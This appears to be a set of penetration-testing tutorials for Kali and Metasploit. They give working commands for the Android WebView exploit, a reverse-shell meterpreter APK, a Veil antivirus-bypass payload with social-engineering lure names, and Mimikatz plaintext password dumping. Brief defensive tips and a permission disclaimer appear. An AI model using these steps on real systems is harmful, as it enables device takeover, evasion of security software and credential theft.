Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

Use Exploit

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

Set UriPath Exploit

5. Finally, type “exploit”:


A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at in this demo, you get a remote session:

Session created

Now just connect to the session using “sessions -i 1”:

Interacting with session

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

LS not found

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo path” revealed that no path was set:

Echo Path

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

export path

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux“.

Getting a Remote Shell on an Android Device using Metasploit

This article was written a while ago and is out of date, check out my new book “Intermediate Security Testing with Kali Linux” to see an in-depth look at getting a remote shell, reading SMS text messages even on a non-rooted phone, pulling data from the internal Android databases, making your own emulated Android devices and much more!  

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

Creating a booby trapped APK file

First up, we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > app.apk

Android App

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it. You will need to put your Kali Linux IP address in for the LHOST address. You can change the port address also if you would like.

Once this is run, a file called “app.apk” will be created:

List File

2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

  • user exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost (enter your Kali IP address)
  • set lport 4444

Then just type exploit to start the handler:


6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:

Reverse TCP session

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:


9. You can see the processes running by typing, “ps”:

PS command

You can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

What’s next with Android support on Meterpreter?

Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android based commands:

Pretty amazing stuff!

Want to learn a lot more about Kali and Metasploit? Check out “Basic Security Testing with Kali Linux“.

Veil AV Bypass on Kali

One of the common hurdles of security and penetration testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs.

A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

Kali wasn’t originally installed on Kali, but has recently been added to the repositories. In this article we will discuss how to install and run Veil on Kali Linux.

Installing Veil

Veil was recently added to Kali, if typing “veil” at a terminal prompt does not start it, it may not be installed yet.

  • To install just type, “apt-get update && apt-get install veil”:
  •  Then to run the program open a terminal and just type, “veil”:

And this will bring you to the main menu:

Veil Kali 1

Using Veil

The first thing to do is to list the available payloads using the “list” command:

Veil Kali 2
The payloads are rated as to it’s success rate, so let’s try one of the PowerShell ones.

So just type the “use” command and the number of the payload. We will use the “powershell/VirtualAlloc” payload.

  • Type, “use 9”.

This will select the payload and present us with the following screen:

Veil Kali 3

  • We will just use the default values, so just type, “generate”.

Then you can choose to use Metasploit’s standard msvenom shellcode or choose your own. We will just choose the default, msfvenom.

  • Type “1” and enter:

Veil Kali 4

Next choose the type of shell; we will just use the default which is reverse_TCP. This means that their computer will connect back to us.

  • Just press “enter” to accept default shell payload:

Veil Kali 5

  • Next Veil will ask for the IP address of the host machine that you are using. Enter the IP address of your Kali machine and press enter.

Veil Kali 6

  • Then enter the Local port that you will be using. I chose to use port 4000:

Veil Kali 7

  • You will then be asked to enter any MSVenom options that you want to use, we won’t be using any, so just press enter to bypass them.

And that is it! Veil will then generate our shellcode with the options that we chose.

  • Now we need to give our created file a name. I chose “CutePuppy”

Okay, “Cutepuppy” sounds a little odd, but remember, you want the target to open the file that you are sending them, so a bit of Social Engineering is required.

If you know they like cute puppies, then our chosen file name is perfect. But you could also name it “2013 Business Report”, or “New Job Requirements”. Whatever you think would be the best.

Veil now has all that it needs and creates our booby-trapped file.

Veil Kali 9

Our file will be stored in the “/usr/share/veil/output/source/” directory.

Just take the created .bat file and send it to our target. When it is run, it will try to connect out to our machine.

We will now need to start a handler listener to accept the connection.

Getting a Remote Shell

To create the remote handler, we will be using Metasploit.

  • Start the Metasploit Framework from the menu or terminal (mfsconsole).
  • Now set up the multi/handler using the following screen:

Veil Kali 10

Be sure to put in the IP address for your machine and the port that you entered into Veil. They must match exactly.

Metasploit will then start the handler and wait for a connection:

Veil Kali 11

Now we just need the victim to run the file that we sent them.

Veil Kali 12

On the Windows 7 machine, if the file is executed, we will see this on our Kali system:

Veil Kali 13

A reverse shell session!

Then if we type “shell”, we see that we do in fact have a complete remote shell:

Veil Kali 14


This should help prove that you cannot trust in your Firewall and Anti-Virus alone to protect you from online threats. Unfortunately many times your network security depends on your users and what they allow to run.

Instruct your users to never run any programs or open any files that they get in an unsolicited e-mail.

Blocking certain file types from entering or leaving your network is also a good idea.

And finally, using a Network Security Monitoring system will help track down what happened and what was compromised if the worst does happen.

Recovering Plain Text Passwords with Metasploit and Mimikatz

I haven’t been posting as much recently as I have been hard at work writing a new book on basic security testing with Kali Linux and other open source security tools. The bad thing is it is taking up about all of my free time now. The good thing is that I am going over a lot of exceptional material that I don’t think I have posted here before.

So today I decided to post a sneak peak at what type of material will be in the book.

Mimikatz, created by our friend Gentil Kiwi, is a great password recovery tool. It is able to recovery passwords from several Windows processes in PLAIN TEXT.

Not to long ago a Mimikatz module was added to Metasploit, so recovering clear text passwords once you have a remote meterpreter shell is easier than ever.

So let’s check it out!

Clear Text Passwords with Mimikatz

We will start out with a post exploit scenario. Using Metasploit we already ran a successful exploit and now have an active remote meterpreter session.

Luckily our target user was using an administrator account and we used the Bypass UAC module to bump our access up to System level. (Explained in the book)

Now we just need to load in the mimikatz module. There is a 32 and 64 bit module, choose accordingly. For this demo we will be using the 32 bit.

Mimikatz 1

  1. At the Meterpreter prompt, type “load mimikatz”.
  2. We will now have a mimikatz prompt. Type “help” for a list of available commands:

Mimikatz 2

The help is pretty self-explanatory; basically type the corresponding command to the creds that you want to recover. So for Kerberos just type “kerberos” at the Meterpreter prompt. Or type “msv” to recover the hashes.

Using these commands you can recover user passwords from multiple system sources – Windows Login passwords, MS Live passwords, terminal server passwords, etc.

You can also use the “mimikatz_command” command to perform even more functions like retrieving stored certificates.

But for today we are just interested in passwords.

Recovering Hashes and Plain Text Passwords

  1. Type “msv”.

Mimikatz 3

And there you go – a list of the password hashes. Well, we could grab the hash and try to crack it, or run it through an online rainbow table, but what if we don’t have that kind of time?

It would be nice just to get the password in plain text.

Well… You can.

  1. Type “Kerberos”.

Mimikatz 4

If you look at our user Ralf, you will see his password in plain text!

And that is it, after we get a remote session with Metasploit and using Mimikatz, recovering clear text passwords is just a few commands away.

(As always do not try these techniques on networks that you do not own or do not have permission to do so. Doing so could get you into serious trouble and you could end up in jail.)